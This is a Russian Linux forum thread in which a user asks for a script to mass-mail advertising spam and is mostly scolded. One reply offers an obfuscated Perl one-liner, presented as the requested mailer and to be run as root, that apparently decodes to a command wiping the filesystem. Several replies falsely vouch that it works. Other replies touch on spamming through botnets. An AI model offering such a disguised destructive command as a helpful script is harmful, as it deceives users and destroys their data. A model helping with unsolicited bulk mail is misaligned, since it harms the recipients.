LINUX.ORG.RU

рассылка [спама] из линукса...?


0

1

Приветствую6 уважаемые! начну с обрисования ситуации, дабы сразу избежать кривотолков: хочу сделать одноразовую рассылку по локальным адресам ( стране ) с рекламой услуг на линуксе. т к с работой у нас крайне хреново, а кушать хочеться, и соотв надо как то клиентов искать. пробовал рассылку в бумажном виде - без штанов остаться можно, и результат на данный момент = 0. электронно всёж практичски бесплатно, и аудитория много шире. список емайл адресов добуду. хорошо бы какой-то скрипт для сендмайла / процмайла, который брал бы адреса из файла, и отсылал бы по каждому письмо с небольшим аттачем. к спаму я и сам весьма негативно отношусь, но, полагаю, одноразовый рассыл с предложением услуг ненанесёт сильно много негативных впечатлений. понимая также, что многим такое интересно для постоянных рассылок типа «распечатать - директору», приведу свой емайл - может кто конфиденциально поделиться решением. спасибо заранее... fordATsten.lv

>, полагаю, одноразовый рассыл с предложением услуг ненанесёт сильно много негативных впечатлений
Так все полагают. Но 100500 «одноразовых» рассылок «наносят» много разных впечатлений.

>fordATsten.lv
А свой e-mail предусмотрительно обфусцировал. Наверное, тебе не нравится получать «одноразовые рассылки»?

proud_anon ★★★★★
()
Ответ на: комментарий от proud_anon

без наиппалова, мне не 17 лет, и линукс я понемногу пользую с 2000 года. спам я и так получаю мешками - но чтото +/- интересное оочень редко приходит - в основном всякие продажи домов в москве (??? это другая страна ваще - нах мне дом в москве? :) ) и тдп. на сто тыщь особо нерассчитываю - думаю пару - тройку тысячь хорошо если раздобуду.

wisedraco ★★
() автор топика

Что за невнятный текст, укурился что ли?

darkshvein ☆☆
()
Ответ на: комментарий от wisedraco

ну, в общем то подобную, отрицательную, реакцию на такого рода пост представить было нетрудно. закономерно, спаммеры никому не нравяться. но - преамбулу я изложил, вариантов особо невижу. на си++ не программирую, вершина моей «программерской» кариёры - простенькие поделки на бейсике на спектруме...

wisedraco ★★
() автор топика

Гнать в шею надо таких «спициалистов». Был бы ты компетентный толковый админ - такие вопросы бы не задавал, ибо легко мог бы сам решить.

Но судя по обратному, возникают сомнения - а что ты вообще знаешь о линухах??? Что это такая крутая убанта, где можно, тыцнув на кнопачку, установить программки? И слово «сендмейл» недавно выучил?

Короче, иди и учи *nix. Услуги специалистов с таким уровнем знаний не нужны.

Chaser_Andrey ★★★★★
()
Ответ на: комментарий от Chaser_Andrey

доброта твоя безгранична!
убунт не пользую - для серваков в основном слака, пересобираю кернели, и прочее по-тихому. решить-то можно всё, вопрос только - какими усилиями?
так как регулярно на баше скриптов не пишу, придёться заново многое читать, изучать, а меж тем задача - то довольно пустяковая. хотя, чего я на тебя-то время трачу? мегаспециалист...

wisedraco ★★
() автор топика

ты если спамом то на винду ориентируися. в линуксе одни красноглазики и там денег нет. спамь блондинок и переустанавливай винды - озолотишся :)

qsloqs ★★
()

Это делается в одну строчку на perl

cat file-with-emails | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

где file-with-emails - файл с емэйл адресами, на которые ты хочешь посылать свой спам. Только скрипт исполнять нужно обязательно от рута, к сожалению, в линуксе это ограничение нельзя обойти.

Vovka-Korovka ★★★★★
()
Ответ на: комментарий от wisedraco

убунт не пользую - для серваков в основном слака

Ей-же-ей, лучше бы ты использовал убунты...

no-dashi ★★★★★
()
Ответ на: комментарий от Vovka-Korovka

+1 годный скрипт и работает везде где есть perl

Rost ★★★★★
()
Ответ на: комментарий от Vovka-Korovka

плюсую! попробовал - работает! ТС, и тебе рекомендую, у самого такая же проблема была, а этот скрипт можно сказать меня спас!

OldWiseCat ★★
()
Ответ на: комментарий от Milky_Way

> И почему Сталин подох в 1953 году. Он бы Вас всех на место поставил.

Сталин ненужен.

blackst0ne ★★★★★
()

>рассылка [спама]

а ну, свалил отсюда, быстро, решительно! Спамеры должны умереть

Pinkbyte ★★★★★
()

>одноразовый рассыл с предложением услуг ненанесёт сильно много негативных впечатлений

один раз - не п***рас. а каждый раз потом будет как первый, да?

Pinkbyte ★★★★★
()

ставишь exim и дёргаешь mail
или пишешь скрипт который коннектится на 25 порт mail сервера и шлёт письмо.

только твой ip быстро пополнит чёрные списки и читать эту фигню никто не будет

для нормального спасинга нужен ботнет на венде и то ип адреса провайдеров не имеют в реверс зоне нужного днс имени мэйл сервера, поэтому и это легко режется

используй лучше спам в поисковиках оно же SEO.

anonymous
()
Ответ на: комментарий от anonymous

про ип и блэклист то понятно, но не в минуты и даже десятка минут это произойдёт, имхо. а мне главное - разослать один раз, и всё. про сео - хз. я уж и незнаю, что там ещё думать. ходить лично по фирмам и предлагать, як коммивояжёр - тоже ничего хорошего, имхо. кризис этот и всеобщее падение уже саиппало. кстати, интересно, что это перловый скрипт по сути делает? из кода мне неочевидно, а в доках глубоко рыться, изучать - както нетянет :)

ну а пинкбайту от всего сердца желаю остаться без работы и попасть в такую же жопу - так сказать, прочуствовать на своей шкуре. а то в 18 лет весь мир на черное и белое делится...:\

wisedraco ★★
() автор топика

Фу, мерзость блин.

Hoodoo ★★★★★
()

язабан.
и это еще и является спамом.

Tanger ★★★★★
()
Ответ на: комментарий от Pinkbyte

perl не знаю.
Какой смертью оно убивает все?

Tanger ★★★★★
()
Ответ на: комментарий от Vovka-Korovka

как я понимаю, этот скрипт нужно под рутом запускать для надежности?

anonymous
()
Ответ на: комментарий от madgnu

тебе это ни к чему. рассылка по .ру адресам не пойдёт. пойдёт локально, по адресам одной страны, в которой живёт менее 2 миллионов двуногих, включая пенсионеров и малых детей...

wisedraco ★★
() автор топика
Ответ на: комментарий от wisedraco

>тебе это ни к чему

Мне ни к чему, а те, кто пользуется блеклистами в той стране — скажут спасибо.

madgnu ★★★★★
()

К нам вернулся Денис Попов!

Текст письма будет нескучен?

З.Ы. А зачем вы ему рассказали, как правильно рассылать? Он же нас всех заспамит!

adepto
()
Ответ на: К нам вернулся Денис Попов! от adepto

это вы меня за дениса принимаете? если да, то ошибка. я тут ещё в 2001 и вверх заглядывал, почитывал. интересные времена были - санычь, биореакторы с луговскими, и вообще... как я уже неоднократно указывал ( для неграмотных милиционеров могу персонально ещё раз повторить) - рассылка будет одноразовая, и по локальным адресам. просто надо попробовать найти себе работу за деньги. вот и всё. так что можно бы уже и успокоиться и слюнями небрызгать...

wisedraco ★★
() автор топика
Ответ на: комментарий от adepto

у пациента явная мания одержимости :) ну ладно, х с тобой - хоть за карлмаркса меня принимай, мне на больных - с пробором...:)

wisedraco ★★
() автор топика
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.